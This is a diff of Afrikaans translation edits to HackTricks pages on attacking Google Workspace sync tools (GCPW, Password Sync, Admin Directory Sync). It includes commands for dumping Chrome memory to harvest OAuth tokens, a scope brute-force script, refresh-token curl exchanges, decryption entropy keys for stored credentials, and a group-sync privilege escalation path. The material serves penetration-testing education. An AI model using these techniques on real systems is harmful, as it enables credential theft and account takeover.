@@ -185,15 +172,15 @@ Die lêer **`%LocalAppData%\Google\Chrome\User Data\Local State`** stoor die sle
- `%LocalAppData%\Google\Chrome\User Data\Default\Web Data`
- `%LocalAppData%\Google\Chrome\Profile*\Default\Web Data`
Dit is moontlik om 'n paar **C# kode** te vind wat toegang tot hierdie tokens in hul ontsleutelde vorm het in [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe).
Dit is moontlik om 'n paar **C# kode** te vind wat toegang tot hierdie tokens in hul ontsleutelde vorm verkry in [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe).
Boonop kan die versleuteling in hierdie kode gevind word: [https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216)
Dit kan waargeneem word dat AESGCM gebruik word, die versleutelde token begin met 'n **weergawe** (**`v10`** op hierdie tydstip), dan het dit [**12B van nonce**](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L42), en dan het dit die **cypher-teks** met 'n finale **mac van 16B**.
Dit kan waargeneem word dat AESGCM gebruik word, die versleutelde token begin met 'n **weergawe** (**`v10`** op hierdie tydstip), dan [**het dit 12B van nonce**](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L42), en dan het dit die **cypher-teks** met 'n finale **mac van 16B**.
### GCPW - Dumping tokens uit prosesse se geheue
Die volgende skrip kan gebruik word om elke **Chrome** proses te **dump** met behulp van `procdump`, die **strings** te onttrek en dan **soek** vir strings wat verband hou met **toegang en verfris tokens**. As Chrome aan 'n of ander Google-webwerf gekoppel is, sal 'n **proses verfris en/of toegang tokens in geheue stoor!**
Die volgende skrip kan gebruik word om elke **Chrome** proses te **dump** met behulp van `procdump`, die **strings** te onttrek en dan **soek** na strings wat verband hou met **toegang en verfris tokens**. As Chrome aan 'n Google-webwerf gekoppel is, sal 'n **proses verfris en/of toegang tokens in geheue stoor!**
<details>
@@ -273,7 +260,7 @@ Remove-Item -Path $dumpFolder -Recurse -Force
Ek het dieselfde met `gcpw_extension.exe` probeer, maar dit het geen token gevind nie.
Om een of ander rede, **sommige onttrokken toegangstokens sal nie geldig wees nie (alhoewel sommige geldig sal wees)**. Ek het die volgende skrip probeer om karakters een vir een te verwyder om die geldige token uit die dump te probeer kry. Dit het my nooit gehelp om 'n geldige een te vind nie, maar dit mag dalk, ek raai:
Om een of ander rede, s**ommige onttrokken toegangstokens sal nie geldig wees nie (alhoewel sommige wel geldig sal wees)**. Ek het die volgende skrip probeer om karakters een vir een te verwyder om te probeer om die geldige token uit die dump te kry. Dit het my nooit gehelp om 'n geldige een te vind nie, maar dit mag dalk:
<details>
@@ -320,18 +307,18 @@ curl -s --data "client_id=77185425430.apps.googleusercontent.com" \
--data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
https://www.googleapis.com/oauth2/v4/token
```
### GCPW - Scopes
### GCPW - Skoppe
> [!NOTE]
> Let daarop dat selfs al het jy 'n hernuwingsteken, dit nie moontlik is om enige omvang vir die toegangsteken aan te vra nie, aangesien jy slegs die **omvangs wat deur die toepassing ondersteun word waar jy die toegangsteken genereer** kan aan vra.
> Let daarop dat dit nie moontlik is om enige skop vir die toegangstoken aan te vra nie, selfs al het jy 'n verfrissings-token, aangesien jy slegs die **skoppe wat deur die toepassing ondersteun word waar jy die toegangstoken genereer** kan aan vra.
>
> Ook, die hernuwingsteken is nie geldig in elke toepassing nie.
> Ook, die verfrissings-token is nie geldig in elke toepassing nie.
Standaard sal GCPW nie toegang hê as die gebruiker tot elke moontlike OAuth-omvang nie, so deur die volgende skrip te gebruik, kan ons die omvangs vind wat met die `refresh_token` gebruik kan word om 'n `access_token` te genereer:
Standaard sal GCPW nie as die gebruiker toegang hê tot elke moontlike OAuth-skop nie, so deur die volgende skrip te gebruik, kan ons die skoppe vind wat met die `refresh_token` gebruik kan word om 'n `access_token` te genereer:
<details>
<summary>Bash script to brute-force scopes</summary>
<summary>Bash-skrip om skoppe te brute-force</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
@@ -391,7 +378,7 @@ https://www.googleapis.com/auth/userinfo.profile
```
</details>
Boonop, deur die Chromium-bronkode te kontroleer, is dit moontlik om [**hierdie lêer te vind**](https://github.com/chromium/chromium/blob/5301790cd7ef97088d4862465822da4cb2d95591/google_apis/gaia/gaia_constants.cc#L24), wat **ander skope** bevat wat aanvaar kan word dat **nie in die vooraf brute-forced lys verskyn nie**. Daarom kan hierdie ekstra skope aanvaar word:
Boonop, deur die Chromium-bronkode na te gaan, is dit moontlik om [**hierdie lêer te vind**](https://github.com/chromium/chromium/blob/5301790cd7ef97088d4862465822da4cb2d95591/google_apis/gaia/gaia_constants.cc#L24), wat **ander skope** bevat wat **nie in die vooraf brute-forced lys verskyn nie**. Daarom kan hierdie ekstra skope aanvaar word:
<details>
@@ -474,12 +461,12 @@ https://www.googleapis.com/auth/wallet.chrome
```
</details>
Let wel, die mees interessante een is moontlik:
Let daarop dat die mees interessante een moontlik is:
```c
// OAuth2 scope for access to all Google APIs.
const char kAnyApiOAuth2Scope[] = "https://www.googleapis.com/auth/any-api";
```
Echter, ek het probeer om hierdie omvang te gebruik om gmail te bekom of groepe te lys en dit het nie gewerk nie, so ek weet nie hoe nuttig dit nog is nie.
Ek het egter probeer om hierdie omvang te gebruik om gmail te bekom of groepe te lys en dit het nie gewerk nie, so ek weet nie hoe nuttig dit nog is nie.
**Kry 'n toegangstoken met al daardie omvange**:
@@ -771,9 +758,9 @@ curl -X POST \
<summary>https://www.googleapis.com/auth/ediscovery (Google Vault)</summary>
**Google Workspace Vault** is 'n byvoeging vir Google Workspace wat gereedskap bied vir data-retensie, soektog, en uitvoer vir jou organisasie se data wat in Google Workspace-dienste soos Gmail, Drive, Chat, en meer gestoor is.
**Google Workspace Vault** is 'n byvoeging vir Google Workspace wat gereedskap bied vir data-retensie, soektog en uitvoer vir jou organisasie se data wat in Google Workspace-dienste soos Gmail, Drive, Chat, en meer gestoor is.
- 'n **Saak** in Google Workspace Vault is 'n **houer** wat al die inligting wat verband hou met 'n spesifieke saak, ondersoek, of regsgeding organiseer en groepeer. Dit dien as die sentrale sentrum vir die bestuur van **Holds**, **Searches**, en **Exports** wat verband hou met daardie spesifieke kwessie.
- 'n **Saak** in Google Workspace Vault is 'n **houer** wat al die inligting wat verband hou met 'n spesifieke saak, ondersoek of regsgeding organiseer en groepeer. Dit dien as die sentrale hub vir die bestuur van **Holds**, **Searches**, en **Exports** wat verband hou met daardie spesifieke kwessie.
- 'n **Hold** in Google Workspace Vault is 'n **bewaringsaksie** wat op spesifieke gebruikers of groepe toegepas word om **die verwydering of verandering** van hul data binne Google Workspace-dienste te **voorkom**. Holds verseker dat relevante inligting intakt en ongewijzigd bly vir die duur van 'n regsgeding of ondersoek.
```bash
# List matters
@@ -816,7 +803,7 @@ Soek dan na die geheim soos `Chrome-GCPW-<sid>` soos in die beeld:
<figure><img src="../../../images/telegram-cloud-photo-size-4-6044191430395675441-x.jpg" alt=""><figcaption></figcaption></figure>
Met 'n **toegangstoken** met die omvang `https://www.google.com/accounts/OAuthLogin` is dit moontlik om die privaat sleutel aan te vra om die wagwoord te ontsleutel:
Dan, met 'n **toegangstoken** met die omvang `https://www.google.com/accounts/OAuthLogin` is dit moontlik om die privaat sleutel aan te vra om die wagwoord te ontsleutel:
<details>
@@ -898,8 +885,8 @@ decrypt_password(access_token, lsa_secret)
Dit is moontlik om die sleutelkomponente hiervan in die Chromium-bronkode te vind:
- API-domein: [https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code](https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22&type=code)
- API-eindpunt: [https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70](https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70)
- API domein: [https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code](https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22&type=code)
- API eindpunt: [https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70](https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70)
## Verwysings

View File

@@ -4,7 +4,7 @@
## Basiese Inligting
Dit is die binêre en diens wat Google bied om die **wagwoorde van die gebruikers tussen die AD** en Workspace **gesinkroniseer te hou**. Elke keer as 'n gebruiker sy wagwoord in die AD verander, word dit na Google gestel.
Dit is die binêre en diens wat Google bied om die **wagwoorde van die gebruikers tussen die AD** en Workspace **gesinkroniseer** te hou. Elke keer as 'n gebruiker sy wagwoord in die AD verander, word dit na Google gestel.
Dit word geïnstalleer in `C:\Program Files\Google\Password Sync` waar jy die binêre `PasswordSync.exe` kan vind om dit te konfigureer en `password_sync_service.exe` (die diens wat sal voortgaan om te loop).
@@ -12,7 +12,7 @@ Dit word geïnstalleer in `C:\Program Files\Google\Password Sync` waar jy die bi
Om hierdie binêre (en diens) te konfigureer, is dit nodig om **toegang te gee aan 'n Super Admin-prinsipaal in Workspace**:
- Meld aan via **OAuth** met Google en dan sal dit **'n token in die register stoor (geënkripteer)**
- Teken in via **OAuth** met Google en dan sal dit **'n token in die register stoor (geënkripteer)**
- Slegs beskikbaar in Domein Beheerders met GUI
- Gee 'n paar **Diensrekening akrediteeringe van GCP** (json-lêer) met regte om **die Workspace gebruikers te bestuur**
- Baie slegte idee aangesien daardie akrediteeringe nooit verval nie en misbruik kan word
@@ -20,23 +20,23 @@ Om hierdie binêre (en diens) te konfigureer, is dit nodig om **toegang te gee a
- Google vereis dit vir domein beheer sonder GUI
- Hierdie akrediteeringe word ook in die register gestoor
Ten opsigte van AD, is dit moontlik om aan te dui om die huidige **aansoek konteks, anoniem of 'n spesifieke akrediteeringe** te gebruik. As die akrediteeringe opsie gekies word, word die **gebruikersnaam** in 'n lêer in die **skyf** gestoor en die **wagwoord** is **geënkripteer** en in die **register** gestoor.
Ten opsigte van AD, is dit moontlik om aan te dui om die huidige **aansoek konteks, anoniem of 'n spesifieke akreditering** te gebruik. As die akreditering opsie gekies word, word die **gebruikersnaam** in 'n lêer in die **skyf** gestoor en die **wagwoord** is **geënkripteer** en in die **register** gestoor.
### GPS - Dumping wagwoord en token van skyf
> [!TIP]
> Let daarop dat [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) in staat is om **GPS** te detecteer, inligting oor die konfigurasie te verkry en **selfs die wagwoord en token te dekripteer**.
In die lêer **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** is dit moontlik om 'n deel van die konfigurasie te vind soos die **`baseDN`** van die AD wat geconfigureer is en die **`gebruikersnaam`** waarvan die akrediteeringe gebruik word.
In die lêer **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** is dit moontlik om 'n deel van die konfigurasie soos die **`baseDN`** van die AD wat geconfigureer is en die **`gebruikersnaam`** wie se akrediteringe gebruik word, te vind.
In die register **`HKLM\Software\Google\Google Apps Password Sync`** is dit moontlik om die **geënkripteerde verfrissing token** en die **geënkripteerde wagwoord** vir die AD gebruiker (indien enige) te vind. Boonop, as daar in plaas van 'n token, 'n paar **SA akrediteeringe** gebruik word, is dit ook moontlik om daardie geënkripteer in daardie register adres te vind. Die **waardes** binne hierdie register is slegs **toeganklik** deur **Administrators**.
In die register **`HKLM\Software\Google\Google Apps Password Sync`** is dit moontlik om die **geënkripteerde hernuwing token** en die **geënkripteerde wagwoord** vir die AD gebruiker (indien enige) te vind. Boonop, as daar in plaas van 'n token, 'n paar **SA akrediteeringe** gebruik word, is dit ook moontlik om daardie geënkripteerde in daardie register adres te vind. Die **waardes** binne hierdie register is slegs **toeganklik** deur **Administrators**.
Die geënkripteerde **wagwoord** (indien enige) is binne die sleutel **`ADPassword`** en is geënkripteer met behulp van die **`CryptProtectData`** API. Om dit te dekripteer, moet jy dieselfde gebruiker wees as die een wat die wagwoord sinkronisasie geconfigureer het en hierdie **entropie** gebruik wanneer jy die **`CryptUnprotectData`** gebruik: `byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };`
Die geënkripteerde token (indien enige) is binne die sleutel **`AuthToken`** en is geënkripteer met behulp van die **`CryptProtectData`** API. Om dit te dekripteer, moet jy dieselfde gebruiker wees as die een wat die wagwoord sinkronisasie geconfigureer het en hierdie **entropie** gebruik wanneer jy die **`CryptUnprotectData`** gebruik: `byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };`\
Boonop, dit is ook geënkodeer met base32hex met die woordeboek **`0123456789abcdefghijklmnopqrstv`**.
Die entropie waardes is gevind deur die hulpmiddel te gebruik. Dit is geconfigureer om die oproepe na **`CryptUnprotectData`** en **`CryptProtectData`** te monitor en toe is die hulpmiddel gebruik om `PasswordSync.exe` te begin en te monitor wat die geconfigureerde wagwoord en auth token aan die begin sal dekripteer en die hulpmiddel sal **die waardes vir die entropie gebruik** in beide gevalle wys:
Die entropie waardes is gevind deur die hulpmiddel te gebruik. Dit is geconfigureer om die oproepe na **`CryptUnprotectData`** en **`CryptProtectData`** te monitor en toe is die hulpmiddel gebruik om `PasswordSync.exe` te begin en te monitor wat die geconfigureerde wagwoord en auth token aan die begin sal dekripteer en die hulpmiddel sal **die waardes vir die entropie wat gebruik is** in beide gevalle wys:
<figure><img src="../../../images/telegram-cloud-photo-size-4-5782633230648853886-y.jpg" alt=""><figcaption></figcaption></figure>
@@ -46,8 +46,8 @@ In die geval dat die Password Sync **geconfigureer is met SA akrediteeringe**, s
### GPS - Dumping tokens van geheue
Net soos met GCPW, is dit moontlik om die geheue van die proses van die `PasswordSync.exe` en die `password_sync_service.exe` prosesse te dump en jy sal in staat wees om verfrissing en toegang tokens te vind (indien hulle reeds gegenereer is).\
Ek vermoed jy kan ook die AD geconfigureerde akrediteeringe vind.
Net soos met GCPW, is dit moontlik om die geheue van die proses van die `PasswordSync.exe` en die `password_sync_service.exe` prosesse te dump en jy sal in staat wees om hernuwing en toegang tokens te vind (indien hulle reeds gegenereer is).\
Ek vermoed jy kan ook die AD geconfigureerde akrediteringe vind.
<details>
@@ -137,18 +137,18 @@ curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.goo
--data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
https://www.googleapis.com/oauth2/v4/token
```
### GPS - Scopes
### GPS - Skoppe
> [!NOTE]
> Let daarop dat selfs al het jy 'n hernuwingsteken, dit nie moontlik is om enige omvang vir die toegangsteken aan te vra nie, aangesien jy slegs die **omvangs wat deur die toepassing ondersteun word waar jy die toegangsteken genereer** kan aan vra.
> Let daarop dat dit nie moontlik is om enige skop vir die toegangstoken aan te vra nie, selfs al het jy 'n verfrissings-token, aangesien jy slegs die **skoppe wat deur die toepassing ondersteun word waar jy die toegangstoken genereer** kan aan vra.
>
> Ook, die hernuwingsteken is nie geldig in elke toepassing nie.
> Ook, die verfrissings-token is nie geldig in elke toepassing nie.
Standaard sal GPS nie toegang hê as die gebruiker tot elke moontlike OAuth omvang nie, so deur die volgende skrip te gebruik, kan ons die omvangs vind wat met die `refresh_token` gebruik kan word om 'n `access_token` te genereer:
Standaard sal GPS nie as die gebruiker toegang hê tot elke moontlike OAuth-skop nie, so deur die volgende skrip te gebruik, kan ons die skoppe vind wat met die `refresh_token` gebruik kan word om 'n `access_token` te genereer:
<details>
<summary>Bash script to brute-force scopes</summary>
<summary>Bash-skrip om skoppe te brute-force</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"

View File

@@ -2,56 +2,56 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Basiese Inligting
Die hoof verskil tussen hierdie manier om gebruikers met GCDS te sinkroniseer is dat GCDS handmatig gedoen word met 'n paar binaries wat jy moet aflaai en uitvoer terwyl **Admin Directory Sync serverloos** deur Google bestuur word in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Die hoof verskil tussen hierdie manier om gebruikers met GCDS te sinkroniseer, is dat GCDS handmatig gedoen word met 'n paar binaries wat jy moet aflaai en uitvoer terwyl **Admin Directory Sync sonder 'n bediener** deur Google bestuur word in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Op die oomblik van hierdie skrywe is hierdie diens in beta en dit ondersteun 2 tipes sinkronisasie: Van **Active Directory** en van **Azure Entra ID:**
- **Active Directory:** Om dit op te stel moet jy **toegang aan Google gee tot jou Active Directory omgewing**. En aangesien Google slegs toegang het tot GCP-netwerke (deur **VPC connectors**) moet jy 'n connector skep en dan jou AD beskikbaar maak vanaf daardie connector deur dit in VM's in die GCP-netwerk te hê of deur Cloud VPN of Cloud Interconnect te gebruik. Dan moet jy ook **akkrediteer** van 'n rekening met lees toegang oor die gids en **sertifikaat** om via **LDAPS** te kontak.
- **Azure Entra ID:** Om dit te konfigureer is dit net nodig om **in Azure aan te meld met 'n gebruiker met lees toegang** oor die Entra ID subskripsie in 'n pop-up wat deur Google gewys word, en Google sal die token met lees toegang oor Entra ID hou.
- **Active Directory:** Om dit op te stel, moet jy **toegang aan Google tot jou Active Directory-omgewing gee**. En aangesien Google slegs toegang het tot GCP-netwerke (deur **VPC-konnektore**) moet jy 'n konnektor skep en dan jou AD beskikbaar maak vanaf daardie konnektor deur dit in VM's in die GCP-netwerk te hê of deur Cloud VPN of Cloud Interconnect te gebruik. Dan moet jy ook **bewyse** van 'n rekening met lees toegang oor die gids verskaf en 'n **sertifikaat** om via **LDAPS** te kontak.
- **Azure Entra ID:** Om dit te konfigureer, is dit net nodig om **in Azure aan te meld met 'n gebruiker met lees toegang** oor die Entra ID-subskripsie in 'n pop-up wat deur Google gewys word, en Google sal die token met lees toegang oor Entra ID hou.
Sodra dit korrek geconfigureer is, sal albei opsies toelaat om **gebruikers en groepe na Workspace te sinkroniseer**, maar dit sal nie toelaat om gebruikers en groepe van Workspace na AD of EntraID te konfigureer nie.
Ander opsies wat dit sal toelaat tydens hierdie sinkronisasie is:
Ander opsies wat dit tydens hierdie sinkronisasie sal toelaat, is:
- Stuur 'n e-pos aan die nuwe gebruikers om in te log
- Outomaties hul e-posadres verander na die een wat deur Workspace gebruik word. So as Workspace `@hacktricks.xyz` gebruik en EntraID gebruikers `@carloshacktricks.onmicrosoft.com` gebruik, sal `@hacktricks.xyz` gebruik word vir die gebruikers wat in die rekening geskep is.
- Outomaties hul e-posadres verander na die een wat deur Workspace gebruik word. So as Workspace `@hacktricks.xyz` gebruik en EntraID-gebruikers `@carloshacktricks.onmicrosoft.com` gebruik, sal `@hacktricks.xyz` gebruik word vir die gebruikers wat in die rekening geskep is.
- Kies die **groepe wat die gebruikers bevat** wat gesinkroniseer sal word.
- Kies **groepe** om te sinkroniseer en in Workspace te skep (of aandui om alle groepe te sinkroniseer).
- Kies om **groepe** te sinkroniseer en in Workspace te skep (of dui aan om alle groepe te sinkroniseer).
### From AD/EntraID -> Google Workspace (& GCP)
### Van AD/EntraID -> Google Workspace (& GCP)
As jy daarin slaag om 'n AD of EntraID te kompromitteer, sal jy totale beheer oor die gebruikers & groepe hê wat gesinkroniseer gaan word met Google Workspace.\
Let egter daarop dat die **wagwoorde** wat die gebruikers in Workspace mag gebruik **die dieselfde kan wees of nie**.
#### Attacking users
#### Aanval op gebruikers
Wanneer die sinkronisasie plaasvind, kan dit **alle gebruikers van AD of net diegene van 'n spesifieke OU** sinkroniseer of net die **gebruikers wat lede van spesifieke groepe in EntraID is**. Dit beteken dat om 'n gesinkroniseerde gebruiker aan te val (of 'n nuwe een te skep wat gesinkroniseer word) jy eers moet uitvind watter gebruikers gesinkroniseer word.
Wanneer die sinkronisasie plaasvind, kan dit **alle gebruikers van AD of net diegene van 'n spesifieke OU** sinkroniseer of net die **gebruikers wat lede van spesifieke groepe in EntraID is**. Dit beteken dat om 'n gesinkroniseerde gebruiker aan te val (of 'n nuwe een te skep wat gesinkroniseer word), jy eers moet uitvind watter gebruikers gesinkroniseer word.
- Gebruikers mag **die wagwoord hergebruik of nie van AD of EntraID nie**, maar dit beteken dat jy die **wagwoorde van die gebruikers moet kompromitteer om in te log**.
- As jy toegang het tot die **e-posse** van die gebruikers, kan jy **die Workspace wagwoord van 'n bestaande gebruiker verander**, of **'n nuwe gebruiker skep**, wag totdat dit gesinkroniseer word en die rekening opstel.
- As jy toegang het tot die **e-posse** van die gebruikers, kan jy **die Workspace-wagwoord van 'n bestaande gebruiker verander**, of **'n nuwe gebruiker skep**, wag totdat dit gesinkroniseer word en die rekening opstel.
Sodra jy toegang tot die gebruiker binne Workspace het, kan daar 'n paar **toestemmings standaard gegee word**.
#### Attacking Groups
#### Aanval op Groepe
Jy moet ook eers uitvind watter groepe gesinkroniseer word. Alhoewel daar die moontlikheid is dat **ALLE** groepe gesinkroniseer word (aangesien Workspace dit toelaat).
Jy moet ook eers uitvind watter groepe gesinkroniseer word. Alhoewel daar die moontlikheid is dat **ALLE** die groepe gesinkroniseer word (aangesien Workspace dit toelaat).
> [!NOTE]
> Let daarop dat selfs al word die groepe en lede in Workspace ingevoer, die **gebruikers wat nie in die gebruikers sinkronisasie gesinkroniseer word nie, sal nie geskep word** tydens groepe sinkronisasie nie, selfs al is hulle lede van enige van die groepe wat gesinkroniseer word.
> Let daarop dat selfs al word die groepe en lede in Workspace ingevoer, die **gebruikers wat nie in die gebruikerssinkronisasie gesinkroniseer word nie, sal nie geskep word** tydens groepe sinkronisasie nie, selfs al is hulle lede van enige van die gesinkroniseerde groepe.
As jy weet watter groepe van Azure **toegangsregte in Workspace of GCP toegeken word**, kan jy eenvoudig 'n gecompromitteerde gebruiker (of nuut geskep) in daardie groep voeg en daardie toestemmings verkry.
As jy weet watter groepe van Azure **toestemmings in Workspace of GCP toegeken word**, kan jy eenvoudig 'n gecompromitteerde gebruiker (of nuut geskep) in daardie groep voeg en daardie toestemmings verkry.
Daar is 'n ander opsie om bestaande bevoorregte groepe in Workspace te misbruik. Byvoorbeeld, die groep `gcp-organization-admins@<workspace.email>` het gewoonlik hoë voorregte oor GCP.
As die sinkronisasie van, byvoorbeeld, EntraID, na Workspace **geconfigureer is om die domein** van die ingevoerde objek **met die e-pos van Workspace te vervang**, sal dit moontlik wees vir 'n aanvaller om die groep `gcp-organization-admins@<entraid.email>` in EntraID te skep, 'n gebruiker in hierdie groep toe te voeg, en wag totdat die sinkronisasie van al die groepe plaasvind.\
**Die gebruiker sal in die groep `gcp-organization-admins@<workspace.email>` bygevoeg word, wat voorregte in GCP verhoog.**
**Die gebruiker sal in die groep `gcp-organization-admins@<workspace.email>` bygevoeg word, wat voorregte in GCP opgradeer.**
### From Google Workspace -> AD/EntraID
### Van Google Workspace -> AD/EntraID
Let daarop dat Workspace akkrediteer met lees slegs toegang oor AD of EntraID benodig om gebruikers en groepe te sinkroniseer. Daarom is dit nie moontlik om Google Workspace te misbruik om enige verandering in AD of EntraID te maak nie. So **dit is nie moontlik** op hierdie oomblik nie.
Let daarop dat Workspace bewese met lees slegs toegang oor AD of EntraID vereis om gebruikers en groepe te sinkroniseer. Daarom is dit nie moontlik om Google Workspace te misbruik om enige verandering in AD of EntraID te maak nie. So **dit is nie moontlik** op hierdie oomblik nie.
Ek weet ook nie waar Google die AD akkrediteer of EntraID token stoor nie en jy **kan dit nie herstel deur die sinkronisasie te herconfigureer nie** (dit verskyn nie in die webvorm nie, jy moet dit weer gee). Maar, vanaf die web kan dit moontlik wees om die huidige funksionaliteit te misbruik om **gebruikers en groepe te lys**.
Ek weet ook nie waar Google die AD-bewyse of EntraID-token stoor nie en jy **kan dit nie herstel deur die sinkronisasie te herconfigureer nie** (dit verskyn nie in die webvorm nie, jy moet dit weer gee). Maar vanaf die web kan dit moontlik wees om die huidige funksionaliteit te misbruik om **gebruikers en groepe te lys**.
{{#include ../../../banners/hacktricks-training.md}}